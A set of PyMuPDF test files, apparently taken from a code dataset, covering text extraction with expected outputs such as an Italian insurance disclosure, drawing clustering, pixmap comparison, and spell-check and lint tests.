assicurativo/finanziaria, \nl\x00ammontare del Premio pagato e gli investimenti selezionati dal Contraente, l\x00Impresa di \nAssicurazione si riserva la facoltà di applicare sconti sugli oneri previsti dal contratto, concordando \ntale agevolazione con il Contraente.\nQuando comincia la copertura e quando finisce?\nDurata\nIl Contratto ha una durata massima pari a 5 anni 11 mesi e 27 giorni, sino alla data di scadenza \n(11/04/2029, la \x01data di scadenza\x02).\nSospensione\nNon sono possibili delle sospensioni della copertura assicurativa\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 5 di 9\n",
'Come posso revocare la proposta, recedere dal contratto o risolvere il contratto? \nRevoca\nLa Proposta di assicurazione può essere revocata fino alle ore 24:00 del giorno in cui il Contratto è \nconcluso. In tal caso, l\x00Impresa di Assicurazione restituirà al Contraente il Premio pagato entro \ntrenta giorni dal ricevimento della comunicazione di Revoca.\nRecesso\nIl Contraente può recedere dal Contratto entro trenta giorni dalla sua conclusione. Il Recesso dovrà \nessere comunicato all\x00Impresa di Assicurazione mediante lettera raccomandata con avviso di \nricevimento.\nL\x00Impresa di Assicurazione, entro trenta giorni dal ricevimento della comunicazione relativa al \nRecesso, rimborserà al Contraente il Controvalore delle Quote attribuite al Contratto alla data di \nricevimento della richiesta di recesso incrementato dai caricamenti, ove previsti, e dedotte \neventuali agevolazioni.\nRisoluzione\nLa risoluzione del contratto è prevista tramite la richiesta di riscatto totale esercitabile in qualsiasi \nmomento della durata contrattuale\nSono previsti riscatti o riduzioni? Si\n no\nValori di\nriscatto e\nriduzione\nA condizione che siano trascorsi almeno 30 giorni dalla Data di Decorrenza (conclusione del \nContratto) e fino all\x00ultimo Giorno Lavorativo della terzultima settimana precedente la data di \nscadenza, il Contraente può riscuotere, interamente o parzialmente, il Valore di Riscatto. In caso di \nRiscatto totale, la liquidazione del Valore di Riscatto pone fine al Contratto con effetto dalla data di \nricezione della richiesta.\nL\x00importo che sarà corrisposto al Contraente in caso di Riscatto sarà pari al Controvalore delle \nQuote del Fondo Interno attribuite al Contratto alla data di Riscatto, al netto dei costi di Riscatto.\nIn caso di Riscatto, ai fini del calcolo del Valore Unitario della Quota, si farà riferimento alla Data di \nValorizzazione della settimana successiva alla data in cui la comunicazione di Riscatto del \nContraente perviene all\x00Impresa di Assicurazione, corredata di tutta la documentazione, al netto dei \ncosti di Riscatto, salvo il verificarsi di Eventi di Turbativa.\nIl Contraente assume il rischio connesso all\x00andamento negativo del valore delle Quote e, pertanto, \nesiste la possibilità di ricevere un ammontare inferiore all\x00investimento finanziario.\nIn caso di Riscatto del Contratto (totale o parziale), l\x00Impresa di Assicurazione non offre alcuna \ngaranzia finanziaria di rendimento minimo e pertanto il Contraente sopporta il rischio di ottenere un \nValore Unitario di Quota inferiore al 100% del Valore Unitario di Quota del Fondo Interno registrato \nalla Data di Istituzione in considerazione dei rischi connessi alla fluttuazione del valore di mercato \ndegli attivi in cui investe, direttamente o indirettamente, il Fondo Interno.\nRichiesta di\ninformazioni\nPer eventuali richieste di informazioni sul valore di riscatto, il Contraente può rivolgersi alla \nCompagnia AXA MPS Financial DAC \x03 Wolfe Tone House, Wolfe Tone Street, Dublin, DO1 HP90 \x03 \nIreland, Numero Verde 800.231.187, e-mail: supporto@axa-mpsfinancial.ie\nA chi è rivolto questo prodotto?\nL\x00investitore al dettaglio a cui è destinato il prodotto varia in funzione dell\x00opzione di investimento sottostante e \nillustrata nel relativo KID.\nIl prodotto è indirizzato a Contraenti persone fisiche e persone giuridiche a condizione che il Contraente (persona fisica) \ne l\x00Assicurato, al momento della sottoscrizione stessa, abbiano un\x00età compresa tra i 18 anni e i 85 anni.\nQuali costi devo sostenere?\nPer l\x00informativa dettagliata sui costi fare riferimento alle indicazioni del KID.\nIn aggiunta rispetto alle informazioni del KID , indicare i seguenti costi a carico del contraente.\nSpese di emissione:\nIl Contratto prevede una spesa fissa di emissione pari a 25 Euro.\nLa deduzione di tale importo avverrà contestualmente alla deduzione del premio.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 6 di 9\n',
"L\x00obiettivo di protezione è da considerarsi al netto delle spese di emissione.\nCosti per riscatto\nIl Riscatto (totale e parziale) prevede un costo che varia in funzione della data di richiesta e secondo le percentuali di \nseguito indicate:\n1°Anno 5,00%; 2°Anno 3,50%; 3°Anno 2,00%; dal quarto anno in poi 0%;\nCosti di intermediazione\nla quota parte massima percepita dall\x00intermediario con riferimento all\x00intero flusso commissionale relativo al prodotto \nè pari al 35,17%.\nQuali sono i rischi e qual è il potenziale rendimento?\nSia con riferimento alla prestazione in caso di vita dell\x00assicurato, sia con riferimento al capitale caso morte riferito ai \nFondi Assicurativi Interni, la Compagnia non presta alcuna garanzia di rendimento minimo o di conservazione del \ncapitale. Pertanto il controvalore della prestazione della Compagnia potrebbe essere inferiore all\x00importo dei premi \nversati, in considerazione dei rischi connessi alla fluttuazione del valore di mercato degli attivi in cui investe, \ndirettamente o indirettamente il Fondo Interno.\nCOME POSSO PRESENTARE I RECLAMI E RISOLVERE LE CONTROVERSIE?\nAll\x00IVASS\nNel caso in cui il reclamo presentato all\x00impesa assicuratrice abbia esito insoddisfacente o risposta \ntardiva, è possibile rivolgersi all\x00IVASS, Via del Quirinale, 21 - 00187 Roma, fax 06.42133206, Info \nsu: www.ivass.it.\nEventuali reclami potranno inoltre essere indirizzati all\x00Autorità Irlandese competente al seguente \nindirizzo:\nFinancial Services Ombudsman 3rd Floor, Lincoln House, Lincoln Place, Dublin 2, D02 VH29 \x03 \nIreland\nPRIMA DI RICORRERE ALL\x00AUTORITÀ GIUDIZIARIA è possibile, in alcuni casi necessario, \navvalersi di sistemi alternativi di risoluzione delle controversie, quali:\nMediazione\nInterpellando un Organismo di Mediazione tra quelli presenti nell'elenco del Ministero della \nGiustizia, consultabile sul sito www.giustizia.it (Legge 9/8/2013, n.98)\nNegoziazione \nassistita\nTramite richiesta del proprio avvocato all\x00impresa\nAltri Sistemi \nalternative di \nrisoluzione delle \ncontroversie\nEventuali reclami relativi ad un contratto o servizio assicurativo nei confronti dell'Impresa di \nassicurazione o dell'Intermediario assicurativo con cui si entra in contatto, nonché qualsiasi \nrichiesta di informazioni, devono essere preliminarmente presentati per iscritto (posta, email) ad \nAXA MPS Financial DAC - Ufficio Reclami secondo seguenti modalità:\nEmail: reclami@axa-mpsfinancial.ie\nPosta: AXA MPS Financial DAC - Ufficio Reclami\nWolfe Tone House, Wolfe Tone Street,\nDublin DO1 HP90 - Ireland\nNumero Verde 800.231.187\navendo cura di indicare:\n-nome, cognome, indirizzo completo e recapito telefonico del reclamante;\n-numero della polizza e nominativo del contraente;\n-breve ed esaustiva descrizione del motivo di lamentela;\n-ogni altra indicazione e documento utile per descrivere le circostanze.\nSarà cura della Compagnia fornire risposta entro 45 giorni dalla data di ricevimento del reclamo, \ncome previsto dalla normativa vigente.\nNel caso di mancato o parziale accoglimento del reclamo, nella risposta verrà fornita una chiara \nspiegazione della posizione assunta dalla Compagnia in relazione al reclamo stesso ovvero della \nsua mancata risposta.\nQualora il reclamante non abbia ricevuto risposta oppure ritenga la stessa non soddisfacente, \nprima di rivolgersi all'Autorità Giudiziaria, può scrivere all'IVASS (Via del Quirinale, 21 - 00187 \nRoma; fax 06.42.133.745 o 06.42.133.353, ivass@pec.ivass.it) fornendo copia del reclamo già \nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 7 di 9\n",
"inoltrato all'impresa ed il relativo riscontro anche utilizzando il modello presente nel sito dell'IVASS \nalla sezione per il Consumatore - come presentare un reclamo.\nEventuali reclami potranno inoltre essere indirizzati all'Autorità Irlandese competente al seguente \nindirizzo:\nFinancial Services Ombudsman\n3rd Floor, Lincoln House,\nLincoln Place, Dublin 2, D02 VH29 Ireland\nIl reclamante può ricorrere ai sistemi alternativi per la risoluzione delle controversie previsti a livello \nnormativo o convenzionale, quali:\n\x04 Mediazione: (Decreto Legislativo n.28/2010 e ss.mm.) puo' essere avviata presentando istanza \nad un Organismo di Mediazione tra quelle presenti nell'elenco del Ministero della Giustizia, \nconsultabile sul sito www.giustizia.it. La legge ne prevede l'obbligatorieta' nel caso in cui si intenda \nesercitare in giudizio i propri diritti in materia di contratti assicurativi o finanziari e di risarcimento \nda responsabilita' medica e sanitaria, costituendo condizione di procedibilita' della domanda.\n\x04 Negoziazione Assistita: (Legge n.162/2014) tramite richiesta del proprio Avvocato all'Impresa. E' \nun accordo mediante il quale le parti convengono di cooperare in buona fede e con lealta' per \nrisolvere in via amichevole la controversia tramite l'assistenza di avvocati. Fine del procedimento e' \nla composizione bonaria della lite, con la sottoscrizione delle parti - assistite dai rispettivi difensori - \ndi un accordo detto convenzione di negoziazione. Viene prevista la sua obbligatorieta' nel caso in \ncui si intenda esercitare in giudizio i propri diritti per ogni controversia in materia di risarcimento del \ndanno da circolazione di veicoli e natanti, ovverosia e' condizione di procedibilita' per l'eventuale \ngiudizio civile. Invece e' facoltativa per ogni altra controversia in materia di risarcimenti o di contratti \nassicurativi o finanziari.\nIn caso di controversia relativa alla determinazione dei danni si puo' ricorrere alla perizia \ncontrattuale prevista dalle Condizioni di Assicurazione per la risoluzione di tale tipologia di \ncontroversie. L'istanza di attivazione della perizia contrattuale dovra' essere indirizzata alla \nCompagnia all' indirizzo\nAXA MPS Financial DAC \nWolfe Tone House, Wolfe Tone Street\nDublin DO1 HP90 - Ireland\nPer maggiori informazioni si rimanda a quanto presente nell'area Reclami del sito \nwww.axa-mpsfinancial.ie. \nPer la risoluzione delle liti transfrontaliere è possibile presentare reclamo all'IVASS o direttamente \nal sistema estero http://ec.europa.eu/internal_market/fin-net/members_en.htm competente \nchiedendo l'attivazione della procedura FIN-NET.\nEventuali reclami relativi la mancata osservanza da parte della Compagnia, degli intermediari e dei \nperiti assicurativi, delle disposizioni del Codice delle assicurazioni, delle relative norme di \nattuazione nonché delle norme sulla commercializzazione a distanza dei prodotti assicurativi \npossono essere presentati direttamente all'IVASS, secondo le modalità sopra indicate.\nSi ricorda che resta salva la facoltà di adire l'autorità giudiziaria.\nREGIME FISCALE\nTrattamento \nfiscale applicabile \nal contratto\nLe seguenti informazioni sintetizzano alcuni aspetti del regime fiscale applicabile al Contratto, ai \nsensi della legislazione tributaria italiana e della prassi vigente alla data di pubblicazione del \npresente documento, fermo restando che le stesse rimangono soggette a possibili cambiamenti che \npotrebbero avere altresì effetti retroattivi. Quanto segue non intende rappresentare un\x00analisi \nesauriente di tutte le conseguenze fiscali del Contratto. I Contraenti sono tenuti a consultare i loro \nconsulenti in merito al regime fiscale proprio del Contratto.\nTasse e imposte\nLe imposte e tasse presenti e future applicabili per legge al Contratto sono a carico del Contraente \no dei Beneficiari e aventi diritto e non è prevista la corresponsione al Contraente di alcuna somma \naggiuntiva volta a compensare eventuali riduzioni dei pagamenti relativi al Contratto.\nTassazione delle somme corrisposte a soggetti non esercenti attività d\x00impresa\n1. In caso di decesso dell\x00Assicurato\nLe somme corrisposte dall\x00Impresa di Assicurazione in caso di decesso dell\x00Assicurato non sono \nsoggette a tassazione IRPEF in capo al percettore e sono esenti dall\x00imposta sulle successioni. Si \nricorda tuttavia che, per effetto della legge 23 dicembre 2014 n. 190 (c.d.\x02Legge di Stabilità\x02), i \nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 8 di 9\n",
'capitali percepiti in caso di morte, a decorrere dal 1 gennaio 2015, in dipendenza di contratti di \nassicurazione sulla vita, a copertura del rischio demografico, sono esenti dall\x00imposta sul reddito \ndelle persone fisiche.\n2. In caso di Riscatto totale o di Riscatto parziale.\nLe somme corrisposte dall\x05Impresa di Assicurazione in caso di Riscatto totale sono soggette ad \nun\x00imposta sostitutiva dell\x00imposta sui redditi nella misura prevista di volta in volta dalla legge. Tale \nimposta, al momento della redazione del presente documento, è pari al 26% sulla differenza \n(plusvalenza) tra il capitale maturato e l\x00ammontare dei premi versati (al netto di eventuali riscatti \nparziali), con l\x00eccezione dei proventi riferibili ai titoli di stato italiani ed equiparati (Paesi facenti \nparte della white list), per i quali l\x00imposta è pari al 12,5%.\nIn caso di Riscatto parziale, ai fini del computo del reddito di capitale da assoggettare alla predetta \nimposta sostitutiva, l\x00ammontare dei premi va rettificato in funzione del rapporto tra il capitale \nerogato ed il valore economico della polizza alla data del Riscatto parziale.\n3. In caso di Recesso\nLe somme corrisposte in caso di Recesso sono soggette all\x00imposta sostitutiva delle imposte sui \nredditi nella misura e con gli stessi criteri indicati per il Riscatto totale del Contratto.\nTassazione delle somme corrisposte a soggetti esercenti attività d\x00impresa\nLe somme corrisposte a soggetti che esercitano l\x00attività d\x00impresa non costituiscono redditi di \ncapitale, bensì redditi d\x00impresa. Su tali somme l\x00Impresa non applica l\x00imposta sostitutiva di cui \nall\x00art. 26-ter del D.P.R. 29 settembre 1973, n. 600.\nSe le somme sono corrisposte a persone fisiche o enti non commerciali in relazione a contratti \nstipulati nell\x00ambito dell\x00attività commerciale, l\x00Impresa non applica l\x00imposta sostitutiva, qualora gli \ninteressati presentino una dichiarazione in merito alla sussistenza di tale requisito.\nL\x00IMPRESA HA L\x00OBBLIGO DI TRASMETTERTI, ENTRO IL 31 MAGGIO DI OGNI ANNO, IL DOCUMENTO \nUNICO DI RENDICONTAZIONE ANNUALE DELLA TUA POSIZIONE ASSICURATIVA\nPER QUESTO CONTRATTO L\x00IMPRESA NON DISPONE DI UN\x00AREA INTERNET DISPOSITIVA RISERVATA \nAL CONTRAENTE (c.d. HOME INSURANCE), PERTANTO DOPO LA SOTTOSCRIZIONE NON POTRAI \nGESTIRE TELEMATICAMENTE IL CONTRATTO MEDESIMO.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 9 di 9\n',
]
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3186.pdf')
fitz_doc = pymupdf.open(path)
texts = list()
for page in fitz_doc:
t = page.get_text()
texts.append(t)
assert texts == texts_expected, f'Unexpected output: {texts=}'
def test_3197():
'''
MuPDF's ActualText support fixes handling of test_3197.pdf.
'''
if pymupdf.mupdf_version_tuple < (1, 24):
print(f'Not running on {pymupdf.mupdf_version_tuple=}.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/test_3197.pdf')
text_utf8_expected = [
b'NYSE - Nasdaq Real Time Price \xe2\x80\xa2 USD\nFord Motor Company (F)\n12.14 -0.11 (-0.90%)\nAt close: 4:00 PM EST\nAfter hours: 7:43 PM EST\nAll numbers in thousands\nAnnual\nQuarterly\nDownload\nSummary\nNews\nChart\nConversations\nStatistics\nHistorical Data\nProfile\nFinancials\nAnalysis\nOptions\nHolders\nSustainability\nInsights\nFollow\n12.15 +0.01 (+0.08%)\nIncome Statement\nBalance Sheet\nCash Flow\nSearch for news, symbols or companies\nNews\nFinance\nSports\nSign in\nMy Portfolio\nNews\nMarkets\nSectors\nScreeners\nPersonal Finance\nVideos\nFinance Plus\nBack to classic\nMore\n',
b'Related Tickers\nTTM\n12/31/2023\n12/31/2022\n12/31/2021\n12/31/2020\n14,918,000\n14,918,000\n6,853,000\n15,787,000\n24,269,000\n-17,628,000\n-17,628,000\n-4,347,000\n2,745,000\n-18,615,000\n2,584,000\n2,584,000\n2,511,000\n-23,498,000\n2,315,000\n25,110,000\n25,110,000\n25,340,000\n20,737,000\n25,935,000\n-8,236,000\n-8,236,000\n-6,866,000\n-6,227,000\n-5,742,000\n51,659,000\n51,659,000\n45,470,000\n27,901,000\n65,900,000\n-41,965,000\n-41,965,000\n-45,655,000\n-54,164,000\n-60,514,000\n-335,000\n-335,000\n-484,000\n--\n--\n6,682,000\n6,682,000\n-13,000\n9,560,000\n18,527,000\n \nYahoo Finance Plus Essential\naccess required.\nUnlock Access\nBreakdown\nOperating Cash\nFlow\nInvesting Cash\nFlow\nFinancing Cash\nFlow\nEnd Cash Position\nCapital Expenditure\nIssuance of Debt\nRepayment of Debt\nRepurchase of\nCapital Stock\nFree Cash Flow\n12/31/2020 - 6/1/1972\nGM\nGeneral Motors Compa\xe2\x80\xa6\n39.49 +1.23%\n\xc2\xa0\nRIVN\nRivian Automotive, Inc.\n15.39 -3.15%\n\xc2\xa0\nNIO\nNIO Inc.\n5.97 +0.17%\n\xc2\xa0\nSTLA\nStellantis N.V.\n25.63 +0.91%\n\xc2\xa0\nLCID\nLucid Group, Inc.\n3.7000 +0.54%\n\xc2\xa0\nTSLA\nTesla, Inc.\n194.77 +0.52%\n\xc2\xa0\nTM\nToyota Motor Corporati\xe2\x80\xa6\n227.09 +0.14%\n\xc2\xa0\nXPEV\nXPeng Inc.\n9.08 +0.89%\n\xc2\xa0\nFSR\nFisker Inc.\n0.5579 -11.46%\n\xc2\xa0\nCopyright \xc2\xa9 2024 Yahoo.\nAll rights reserved.\nPOPULAR QUOTES\nTesla\nDAX Index\nKOSPI\nDow Jones\nS&P BSE SENSEX\nSPDR S&P 500 ETF Trust\nEXPLORE MORE\nCredit Score Management\nHousing Market\nActive vs. Passive Investing\nShort Selling\nToday\xe2\x80\x99s Mortgage Rates\nHow Much Mortgage Can You Afford\nABOUT\nData Disclaimer\nHelp\nSuggestions\nSitemap\n',
]
with pymupdf.open(path) as document:
for i, page in enumerate(document):
text = page.get_text()
#print(f'{i=}:')
text_utf8 = text.encode('utf8')
#print(f' {text_utf8=}')
#print(f' {text_utf8_expected[i]=}')
if pymupdf.mupdf_version_tuple >= (1, 24):
assert text_utf8 == text_utf8_expected[i]
else:
assert text_utf8 != text_utf8_expected[i]
def test_document_text():
import platform
import time
path = os.path.abspath(f'{__file__}/../../tests/resources/mupdf_explored.pdf')
concurrency = None
def llen(texts):
l = 0
for text in texts:
l += len(text) if isinstance(text, str) else text
return l
results = dict()
_stats = 1
print('')
method = 'single'
t = time.time()
document = pymupdf.Document(path)
texts0 = pymupdf.get_text(path, _stats=_stats)
t0 = time.time() - t
print(f'{method}: {t0=} {llen(texts0)=}', flush=1)
# Dummy run seems to avoid misleading stats with slow first run.
method = 'mp'
texts = pymupdf.get_text(path, concurrency=concurrency, method=method, _stats=_stats)
method = 'mp'
t = time.time()
texts = pymupdf.get_text(path, concurrency=concurrency, method=method, _stats=_stats)
t = time.time() - t
print(f'{method}: {concurrency=} {t=} ({t0/t:.2f}x) {llen(texts)=}', flush=1)
assert texts == texts0
if platform.system() != 'Windows':
method = 'fork'
t = time.time()
texts = pymupdf.get_text(path, concurrency=concurrency, method='fork', _stats=_stats)
t = time.time() - t
print(f'{method}: {concurrency=} {t=} ({t0/t:.2f}x) {llen(texts)=}', flush=1)
assert texts == texts0
if _stats:
pymupdf._log_items_clear()
def test_3594():
verbose = 0
print()
d = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_3594.pdf'))
for i, p in enumerate(d.pages()):
text = p.get_text()
print(f'Page {i}:')
if verbose:
for line in text.split('\n'):
print(f' {line!r}')
print('='*40)
if pymupdf.mupdf_version_tuple < (1, 24, 3):
# We expect MuPDF warnings.
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt
def test_3687():
path1 = pymupdf.open(os.path.normpath(f'{__file__}/../../tests/resources/test_3687.epub'))
path2 = pymupdf.open(os.path.normpath(f'{__file__}/../../tests/resources/test_3687-3.epub'))
for path in path1, path2:
print(f'Looking at {path=}.')
with pymupdf.open(path) as document:
page = document[0]
text = page.get_text("text")
print(f'{text=!s}')
wt = pymupdf.TOOLS.mupdf_warnings()
print(f'{wt=}')
assert wt == 'unknown epub version: 3.0'
def test_3705():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3705.pdf')
def get_all_page_from_pdf(document, last_page=None):
if last_page:
document.select(list(range(0, last_page)))
if document.page_count > 30:
document.select(list(range(0, 30)))
return iter(page for page in document)
filename = os.path.basename(path)
doc = pymupdf.open(path)
texts0 = list()
for i, page in enumerate(get_all_page_from_pdf(doc)):
text = page.get_text()
print(i, text)
texts0.append(text)
texts1 = list()
doc = pymupdf.open(path)
for page in doc:
if page.number >= 30: # leave the iterator immediately
break
text = page.get_text()
texts1.append(text)
assert texts1 == texts0
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'Actualtext with no position. Text may be lost or mispositioned.\n... repeated 434 times...'
def test_3650():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3650.pdf')
doc = pymupdf.Document(path)
blocks = doc[0].get_text("blocks")
t = [block[4] for block in blocks]
print(f'{t=}')
assert t == [
'RECUEIL DES ACTES ADMINISTRATIFS\n',
'n° 78 du 28 avril 2023\n',
]
| 51,740 | Python | .py | 336 | 144.919643 | 5,155 | 0.758476 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,327 | gentle_compare.py | pymupdf_PyMuPDF/tests/gentle_compare.py | import math
import pymupdf
def gentle_compare(w0, w1):
"""Check lists of "words" extractions for approximate equality.
* both lists must have same length
* word items must contain same word strings
* word rectangles must be approximately equal
"""
tolerance = 1e-3 # maximum (Euclidean) norm of difference rectangle
word_count = len(w0) # number of words
if word_count != len(w1):
print(f"different number of words: {word_count}/{len(w1)}")
return False
for i in range(word_count):
if w0[i][4] != w1[i][4]: # word strings must be the same
print(f"word {i} mismatch")
return False
r0 = pymupdf.Rect(w0[i][:4]) # rect of first word
r1 = pymupdf.Rect(w1[i][:4]) # rect of second word
delta = (r1 - r0).norm() # norm of difference rectangle
if delta > tolerance:
print(f"word {i}: rectangle mismatch {delta}")
return False
return True
def pixmaps_rms(a, b, out_prefix=''):
'''
Returns RMS diff of raw bytes of two pixmaps. We assert that the pixmaps
are the same size.
<a> and <b> can each be a pymupdf.Pixmap or path of a bitmap file.
'''
if isinstance(a, str):
print(f'{out_prefix}pixmaps_rms(): reading pixmap from {a=}.')
a = pymupdf.Pixmap(a)
if isinstance(b, str):
print(f'{out_prefix}pixmaps_rms(): reading pixmap from {b=}.')
b = pymupdf.Pixmap(b)
assert a.irect == b.irect, f'Differing rects: {a.irect=} {b.irect=}.'
a_mv = a.samples_mv
b_mv = b.samples_mv
assert len(a_mv) == len(b_mv)
e = 0
for i, (a_byte, b_byte) in enumerate(zip(a_mv, b_mv)):
if i % 100000 == 0:
print(f'{out_prefix}compare_pixmaps(): {i=} {e=} {a_byte=} {b_byte=}.')
e += (a_byte - b_byte) ** 2
rms = math.sqrt(e / len(a_mv))
print(f'{out_prefix}compare_pixmaps(): {e=} {rms=}.')
return rms
| 1,949 | Python | .py | 48 | 33.895833 | 83 | 0.600528 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,328 | test_cluster_drawings.py | pymupdf_PyMuPDF/tests/test_cluster_drawings.py | import os
import pymupdf
scriptdir = os.path.dirname(__file__)
def test_cluster1():
"""Confirm correct identification of known examples."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_cluster1' in classic")
return
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
doc = pymupdf.open(filename)
page = doc[0]
assert len(page.cluster_drawings()) == 10
filename = os.path.join(scriptdir, "resources", "chinese-tables.pdf")
doc = pymupdf.open(filename)
page = doc[0]
assert len(page.cluster_drawings()) == 2
def test_cluster2():
"""Join disjoint but neighbored drawings."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_cluster2' in classic")
return
doc = pymupdf.open()
page = doc.new_page()
r1 = pymupdf.Rect(100, 100, 200, 200)
r2 = pymupdf.Rect(203, 203, 400, 400)
page.draw_rect(r1)
page.draw_rect(r2)
assert page.cluster_drawings() == [r1 | r2]
def test_cluster3():
"""Confirm as separate if neighborhood threshold exceeded."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_cluster3' in classic")
return
doc = pymupdf.open()
page = doc.new_page()
r1 = pymupdf.Rect(100, 100, 200, 200)
r2 = pymupdf.Rect(204, 200, 400, 400)
page.draw_rect(r1)
page.draw_rect(r2)
assert page.cluster_drawings() == [r1, r2]
| 1,436 | Python | .py | 40 | 30.725 | 73 | 0.655148 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,329 | test_codespell.py | pymupdf_PyMuPDF/tests/test_codespell.py | import pymupdf
import os
import platform
import shlex
import subprocess
import sys
import textwrap
def test_codespell():
'''
Check rebased Python code with codespell.
'''
if not hasattr(pymupdf, 'mupdf'):
print('Not running codespell with classic implementation.')
return
if platform.system() == 'Windows':
# Git commands seem to fail on Github Windows runners.
print(f'test_codespell(): Not running on Widows')
return
root = os.path.abspath(f'{__file__}/../..')
# For now we ignore files that we would ideally still look at, because it
# is difficult to exclude some text sections.
skips = textwrap.dedent('''
*.pdf
changes.txt
docs/_static/prism/prism.js
docs/_static/prism/prism.js
docs/locales/ja/LC_MESSAGES/changes.po
docs/locales/ja/LC_MESSAGES/recipes-common-issues-and-their-solutions.po
docs/recipes-common-issues-and-their-solutions.rst
docs/recipes-text.rst
docs/samples/national-capitals.py
locales
src_classic/*
tests
tests/test_story.py
tests/test_textbox.py
tests/test_textextract.py
''')
skips = skips.strip().replace('\n', ',')
command = textwrap.dedent(f'''
cd {root} && codespell
--skip {shlex.quote(skips)}
--ignore-words-list re-use,flate,thirdparty
''')
sys.path.append(root)
try:
import pipcl
finally:
del sys.path[0]
git_files = pipcl.git_items(root)
for p in git_files:
_, ext = os.path.splitext(p)
if ext in ('.png', '.pdf', '.jpg', '.svg'):
pass
else:
command += f' {p}\n'
if platform.system() != 'Windows':
command = command.replace('\n', ' \\\n')
# Don't print entire command because very long, and will be displayed
# anyway if there is an error.
#print(f'test_codespell(): Running: {command}')
print(f'Running codespell.')
subprocess.run(command, shell=1, check=1)
print('test_codespell(): codespell succeeded.')
| 2,242 | Python | .py | 64 | 26.3125 | 84 | 0.598783 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,330 | test_pylint.py | pymupdf_PyMuPDF/tests/test_pylint.py | import pymupdf
import os
import re
import subprocess
import sys
import textwrap
def test_pylint():
if not hasattr(pymupdf, 'mupdf'):
print(f'test_pylint(): Not running with classic implementation.')
return
ignores = ''
ignores += textwrap.dedent(
'''
C0103: Constant name "g_exceptions_verbose" doesn't conform to UPPER_CASE naming style (invalid-name)
C0115: Missing class docstring (missing-class-docstring)
C0116: Missing function or method docstring (missing-function-docstring)
C0301: Line too long (142/100) (line-too-long)
C0302: Too many lines in module (23586/1000) (too-many-lines)
C0303: Trailing whitespace (trailing-whitespace)
C0325: Unnecessary parens after 'not' keyword (superfluous-parens)
C0415: Import outside toplevel (traceback) (import-outside-toplevel)
R0902: Too many instance attributes (9/7) (too-many-instance-attributes)
R0903: Too few public methods (1/2) (too-few-public-methods)
R0911: Too many return statements (9/6) (too-many-return-statements)
R0913: Too many arguments (6/5) (too-many-arguments)
R1705: Unnecessary "elif" after "return", remove the leading "el" from "elif" (no-else-return)
R1720: Unnecessary "elif" after "raise", remove the leading "el" from "elif" (no-else-raise)
R1724: Unnecessary "elif" after "continue", remove the leading "el" from "elif" (no-else-continue)
R1735: Consider using '{}' instead of a call to 'dict'. (use-dict-literal)
W0511: Fixme: we don't support JM_MEMORY=1. (fixme)
W0622: Redefining built-in 'FileNotFoundError' (redefined-builtin)
W0622: Redefining built-in 'open' (redefined-builtin)
W1309: Using an f-string that does not have any interpolated variables (f-string-without-interpolation)
R1734: Consider using [] instead of list() (use-list-literal)
'''
)
# Items that we might want to fix.
ignores += textwrap.dedent(
'''
C0114: Missing module docstring (missing-module-docstring)
C0117: Consider changing "not rotate % 90 == 0" to "rotate % 90 != 0" (unnecessary-negation)
C0123: Use isinstance() rather than type() for a typecheck. (unidiomatic-typecheck)
C0200: Consider using enumerate instead of iterating with range and len (consider-using-enumerate)
C0201: Consider iterating the dictionary directly instead of calling .keys() (consider-iterating-dictionary)
C0209: Formatting a regular string which could be an f-string (consider-using-f-string)
C0305: Trailing newlines (trailing-newlines)
C0321: More than one statement on a single line (multiple-statements)
C1802: Do not use `len(SEQUENCE)` without comparison to determine if a sequence is empty (use-implicit-booleaness-not-len)
C1803: "select == []" can be simplified to "not select", if it is strictly a sequence, as an empty list is falsey (use-implicit-booleaness-not-comparison)
R0912: Too many branches (18/12) (too-many-branches)
R0914: Too many local variables (20/15) (too-many-locals)
R0915: Too many statements (58/50) (too-many-statements)
R1702: Too many nested blocks (7/5) (too-many-nested-blocks)
R1703: The if statement can be replaced with 'var = bool(test)' (simplifiable-if-statement)
R1710: Either all return statements in a function should return an expression, or none of them should. (inconsistent-return-statements)
R1714: Consider merging these comparisons with 'in' by using 'width not in (1, 0)'. Use a set instead if elements are hashable. (consider-using-in)
R1716: Simplify chained comparison between the operands (chained-comparison)
R1717: Consider using a dictionary comprehension (consider-using-dict-comprehension)
R1718: Consider using a set comprehension (consider-using-set-comprehension)
R1719: The if expression can be replaced with 'bool(test)' (simplifiable-if-expression)
R1721: Unnecessary use of a comprehension, use list(roman_num(num)) instead. (unnecessary-comprehension)
R1728: Consider using a generator instead 'max(len(k) for k in item.keys())' (consider-using-generator)
R1728: Consider using a generator instead 'max(len(r.cells) for r in self.rows)' (consider-using-generator)
R1730: Consider using 'rowheight = min(rowheight, height)' instead of unnecessary if block (consider-using-min-builtin)
R1731: Consider using 'right = max(right, x1)' instead of unnecessary if block (consider-using-max-builtin)
W0105: String statement has no effect (pointless-string-statement)
W0107: Unnecessary pass statement (unnecessary-pass)
W0212: Access to a protected member _graft_id of a client class (protected-access)
W0602: Using global for 'CHARS' but no assignment is done (global-variable-not-assigned)
W0602: Using global for 'EDGES' but no assignment is done (global-variable-not-assigned)
W0603: Using the global statement (global-statement)
